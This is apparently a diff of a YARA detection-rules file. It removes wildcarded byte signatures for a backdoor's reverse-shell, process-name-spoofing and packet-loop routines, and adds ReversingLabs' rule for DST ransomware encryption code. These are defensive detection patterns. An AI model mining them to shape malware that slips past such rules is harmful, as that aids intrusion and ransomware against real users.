+            ?? ?? BF ?? ?? ?? ?? 48 89 7B ?? 48 89 53 ?? 48 8D 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 48
+            89 43 ?? 48 89 4B ?? 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 45 31 C0
+            4C 89 85 ?? ?? ?? ?? 4C 8D A5 ?? ?? ?? ?? 49 C7 04 24 ?? ?? ?? ?? 49 8B 14 24 48 89
+            95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D AD ?? ?? ?? ?? 49 B9 ?? ?? ?? ?? ?? ?? ??
+            ?? 4D 89 4D ?? 49 8B 4D ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D B5 ?? ??
+            ?? ?? 4D 89 06 49 8B 16 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ??
+            45 31 C0 41 3B C0 7E ?? 41 BF ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ??
+            4D 69 D7 ?? ?? ?? ?? 4D 89 11 4C 89 D2 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ??
+            ?? 48 83 C4 ?? 45 31 C0 41 3B C0 79 ?? 4C 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
+            C7 01 ?? ?? ?? ?? 48 8B 01 48 89 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 8D ?? ??
+            ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 85 C0 7E ?? 48 8B 9D ?? ?? ?? ?? 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 EB
         }
-		$reverse_shell_v1_p1 = {
-            48 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 89
-            C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ??
-            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B C9 C3
-            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ??
-            ?? ?? ?? 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ??
-            ?? 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ??
-            ?? 48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 8B 05
-            ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 90 EB ?? 90 EB ?? 90 B8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 8D 9D ?? ?? ?? ?? 48 89 D1 48 89 DF FC F3 48 AB 89 F8 89 CA 89 55 ?? 89 45
-            ?? 8B 05 ?? ?? ?? ?? 48 98 48 C1 E8 ?? 48 89 C2 48 8B 84 C5 ?? ?? ?? ?? 8B 0D ?? ??
-            ?? ?? 83 E1 ?? BB ?? ?? ?? ?? 48 89 DE 48 D3 E6 48 89 F1 48 09 C8 48 89 84 D5 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E8 ?? 48 89 C2 48 8B 84 C5 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 83 E1 ?? BB ?? ?? ?? ?? 48 89 DF 48 D3 E7 48 89 F9 48 09 C8 48 89 84 D5 ??
-            ?? ?? ?? 8B 05 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7E ?? 8B 05 ?? ?? ?? ?? 83 C0 ?? EB
-        }
-		$reverse_shell_v1_p2 = {
-            8B 85 ?? ?? ?? ?? 83 C0 ?? 48 8D 9D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 89 DE 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 05 ?? ?? ?? ??
-            48 98 48 C1 E8 ?? 48 8B 84 C5 ?? ?? ?? ?? 48 89 C2 8B 05 ?? ?? ?? ?? 83 E0 ?? 48 89
-            D3 89 C1 48 D3 EB 48 89 D8 83 E0 ?? 84 C0 74 ?? 8B 05 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
-            ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ??
-            ?? 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 85
-            C0 0F 8E ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E8 ?? 48 8B 84 C5 ?? ?? ?? ?? 48
-            89 C2 8B 85 ?? ?? ?? ?? 83 E0 ?? 48 89 D3 89 C1 48 D3 EB 48 89 D8 83 E0 ?? 84 C0 0F
-            84 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 48 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ??
-            ?? 8B 45 ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
-            89 45 ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 29
-            C2 8B 45 ?? 8D 04 02 89 45 ?? 83 7D ?? ?? 7E ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 48 63
-            D0 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 7D ?? ?? 7F
-            ?? B8 ?? ?? ?? ?? 89 C2 2B 55 ?? 8B 45 ?? 48 63 C8 48 8D 85 ?? ?? ?? ?? 48 01 C8 8B
-        }
-		$reverse_shell_v1_p3 = {
-            8D ?? ?? ?? ?? 48 89 C6 89 CF E8 ?? ?? ?? ?? 89 45 ?? 66 C7 85 ?? ?? FF FF ?? ?? 0F
-            B7 85 ?? ?? ?? ?? 66 89 85 ?? ?? FF FF 0F B6 85 ?? ?? ?? ?? 0F B6 C0 89 C2 C1 E2 ??
-            0F B6 85 ?? ?? ?? ?? 0F B6 C0 8D 04 02 66 89 85 ?? ?? FF FF 0F B6 85 ?? ?? ?? ?? 0F
-            B6 C0 89 C2 C1 E2 ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 8D 04 02 66 89 85 ?? ?? FF FF 8B
-            05 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 85 ?? ?? ?? ?? 48
-            89 D6 48 29 C6 48 89 F0 48 89 C2 8B 05 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 CE 89
-            C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8D 85 ?? ?? ?? ?? 89 C2 8B 45 ?? 01 C2 48 8B 45 ?? 89
-            D7 29 C7 89 F8 83 E8 ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48
-            8B 45 ?? 48 8D 48 ?? 8B 05 ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? E9 ??
-            ?? ?? ?? 8B 45 ?? 48 63 D0 8B 05 ?? ?? ?? ?? 48 8B 4D ?? 48 89 CE 89 C7 E8 ?? ?? ??
-            ?? 48 85 C0 0F 8F ?? ?? ?? ?? EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 8B 85 ?? ?? ?? ??
-            89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8
-        }
-		$set_process_name_v1_p1 = {
-            55 48 89 E5 48 83 EC ?? 89 7D ?? 48 89 75 ?? 48 89 55 ?? 48 C7 45 ?? ?? ?? ?? ?? 48
-            C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 89 05 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? EB ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48
-            01 D0 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 03 45 ?? 48 83 C0 ?? 48 89 45 ?? 83 45 ??
-            ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 85 C0 75
-            ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? B8 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ??
-            48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 8D 50 ?? 48 8B 05
-            ?? ?? ?? ?? 8B 4D ?? 48 63 C9 48 C1 E1 ?? 48 01 C8 48 8B 08 48 8B 45 ?? 48 89 CE 48
-            89 C7 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 8D 14 10
-            48 8B 45 ?? 48 89 02 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48
-        }
-		$set_process_name_v1_p2 = {
-            8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 01 45 ?? 83 45 ?? ?? 48 8B 05 ?? ?? ??
-            ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B
-            45 ?? 48 8B 00 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 C1 E0 ?? 48
-            03 45 ?? 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 01 45 ?? 83 45 ?? ?? 8B 45
-            ?? 3B 45 ?? 7C ?? C7 45 ?? ?? ?? ?? ?? EB ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2
-            48 C1 E2 ?? 48 01 D0 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 01 45 ?? 83 45
-            ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 85 C0
-            75 ?? 48 8B 55 ?? 48 8B 05 ?? ?? ?? ?? 48 89 D1 48 29 C1 48 89 C8 48 89 C2 48 8B 05
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 05 ?? ?? ?? ??
-            48 89 D1 48 29 C1 48 89 C8 48 89 C2 48 8B 4D ?? 48 8B 05 ?? ?? ?? ?? 48 89 CE 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            B8 ?? ?? ?? ?? C9 C3
-        }
-		$packet_loop_v2_p1 = {
-            55 89 E5 57 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ??
-            66 C7 85 ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 0F B7 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C2 B8 ?? ??
-            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45
-            ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 0F B6 00 0F B6 C0 83 E0 ?? C1 E0 ??
-            89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 0F B6 40 ?? 0F B6 C0 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ??
-            EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B 45 ?? 8D 04 02 89 45 ?? 8B 45 ?? 0F B6 40 ?? 0F
-            B6 C0 25 ?? ?? ?? ?? C1 F8 ?? C1 E0 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B 45 ??
-            01 C2 8B 45 ?? 8D 04 02 89 45 ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 83 C0
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+}
+rule REVERSINGLABS_Win64_Ransomware_DST : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects DST ransomware."
+		author = "ReversingLabs"
+		id = "bcc9933d-14eb-5f83-a136-5f009c7a3282"
+		date = "2021-12-06"
+		modified = "2021-12-06"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.DST.yara#L1-L170"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "b658093232a2265d425e3b38758268c116bbac51fa5eed372b5b4f00de4c6880"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DST"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$encrypt_files_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
+            ?? 48 89 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48
+            89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 4C 24 ??
+            31 C9 31 FF E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB
+            0F 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 0F 1F 00
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85
+            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D
         }
-		$packet_loop_v2_p2 = {
-            89 45 ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 0F
-            84 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 83 F8 ?? 75 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? EB ?? 8B
-            45 ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-            85 9C FC FF FF 2F C6 85 9D FC FF FF 75 C6 85 9E FC FF FF 73 C6 85 9F FC FF FF 72 C6
-            85 A0 FC FF FF 2F C6 85 A1 FC FF FF 6C C6 85 A2 FC FF FF 69 C6 85 A3 FC FF FF 62 C6
-            85 A4 FC FF FF 65 C6 85 A5 FC FF FF 78 C6 85 A6 FC FF FF 65 C6 85 A7 FC FF FF 63 C6
-            85 A8 FC FF FF 2F C6 85 A9 FC FF FF 70 C6 85 AA FC FF FF 6F C6 85 AB FC FF FF 73 C6
-            85 AC FC FF FF 74 C6 85 AD FC FF FF 66 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 78 C6
-            85 B0 FC FF FF 2F C6 85 B1 FC FF FF 6D C6 85 B2 FC FF FF 61 C6 85 B3 FC FF FF 73 C6
-            85 B4 FC FF FF 74 C6 85 B5 FC FF FF 65 C6 85 B6 FC FF FF 72 C6 85 B7 FC FF FF ?? E8
-            ?? ?? ?? ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 8B BD ?? ?? ?? ?? F2 AE 89 C8 F7 D0 8D 50 ?? A1 ??
-            ?? ?? ?? 89 C7 FC 89 D1 B8 ?? ?? ?? ?? F3 AA 8B 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89
+		$encrypt_files_p2 = {
+            48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 44 24 ?? E8 ?? ?? ?? ?? 90 85 C0 0F 85 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
+            ?? 48 85 DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ??
+            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 85 C9 0F 85 ?? ?? ?? ??
+            48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ??
+            ?? ?? FF D2 48 8B 0D ?? ?? ?? ?? 83 B9 ?? ?? ?? ?? ?? 75 ?? 48 89 C2 48 C1 E0 ?? 48
+            8D 70 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 D1 48 F7 EE 48 8D 14 CA 48 8D 52 ?? 48
         }
-		$packet_loop_v2_p3 = {
-            44 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC
-            8B BD ?? ?? ?? ?? F2 AE 89 C8 F7 D0 83 E8 ?? 89 C2 8B 45 ?? 83 C0 ?? C7 44 24 ?? ??
-            ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 8B BD ?? ?? ?? ?? F2 AE 89 C8 F7 D0 83 E8 ?? 89 C2 8B
-            45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
-            83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 04 24 E8
-            ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 0F B7 40
-            ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 0F B7 C0 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 83 F8 ?? 74 ?? 8B 45 ?? 8B 40 ?? 85
-            C0 74 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? 8B 45 ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? C7 00 ??
-            ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 0F B7
-            40 ?? 0F B7 C0 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 7E
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45
+		$encrypt_files_p3 = {
+            C1 FA ?? 48 C1 FE ?? 48 29 F2 EB ?? 48 8D 70 ?? 48 89 C1 48 B8 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 F7 EE 48 8D 14 0A 48 8D 52 ?? 48 D1 FA 48 C1 FE ?? 48 29 F2 48 C1 E2 ?? 48 8D
+            4A ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 CB E8 ?? ?? ?? ?? 48 89 C3 48 8B 4C
+            24 ?? 48 89 CF 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
+            DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 31 FF 48 8B 74
+            24 ?? 4C 8B 84 24 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 DB 0F
+            85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? 48 8B BC 24 ??
+            ?? ?? ?? 31 F6 45 31 C0 4D 89 C1 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
+            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24
+            ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
+            ?? 31 DB 31 C9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
+            DB 74 ?? 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 94 24 ?? ?? ?? ?? 48 8B 72 ?? 48 8B 42
+            ?? 48 8B 56 ?? 31 DB 31 C9 48 89 CF FF D2 48 8B 15 ?? ?? ?? ?? 48 89 CF 48 89 D9 48
         }
-		$reverse_shell_v2_p1 = {
-            8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ??
-            ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ??
-            E8 ?? ?? ?? ?? 85 C0 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B
-            45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44
-            24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F
